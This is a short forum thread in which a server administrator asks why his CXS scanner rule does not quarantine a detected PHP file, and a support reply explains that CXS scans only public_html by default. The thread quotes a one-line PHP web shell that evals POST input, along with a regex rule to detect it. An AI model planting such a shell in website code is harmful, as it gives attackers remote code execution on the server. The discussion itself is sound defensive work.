Page 1 of 1

First time ever CXS rule is not working, why?

Posted: 16 Dec 2023, 12:39
by Sergio
Hi, Sarah.
Would you be kind to tell me what I am doing wrong on the following rule that I have created on CXS?

InmunifyAV+ is detecting the following code as malicious, so, I have added the rule in cxs.xtra to quarantine the file but is not working.

This is the code that I want to block:
<?php eval($_POST["ly"]);exit; ?>
(the letters inside brackets are random and can be upper and/or lower case.

All the rules are created (in CloudLinux) directory:
/home/domain/.cagefs/tmp

I have added the following rule in cxs.xtra:

Code: Select all

regall:quarantine:\<\?php eval\(\$_POST\["[a-zA-Z][a-zA-Z]"\]\);exit; \?\>
regex101 show the rule is working:
MATCH INFORMATION:
Match1 0-33 <?php eval($_POST["ly"]);exit; ?>
Could it be that CXS is not checking inside ".cagefs/tmp" ?

Thanks in advance for your inputs.

Regards,
Sergio

Re: First time ever CXS rule is not working, why?

Posted: 16 Dec 2023, 22:13
by Sarah
Hi Sergio,

By default cxs will not scan files outside the users public_html directory, so unless you have disabled this limitation (by removing --www or unchecking the option in the wizards) then it will not be scanning those files at all.

Regards,
Sarah

Re: First time ever CXS rule is not working, why?

Posted: 16 Dec 2023, 23:01
by Sergio
Ohhh, that is why.

Thought I was doing something wrong, thanks for telling, appreciated.

Best Regards,
Sergio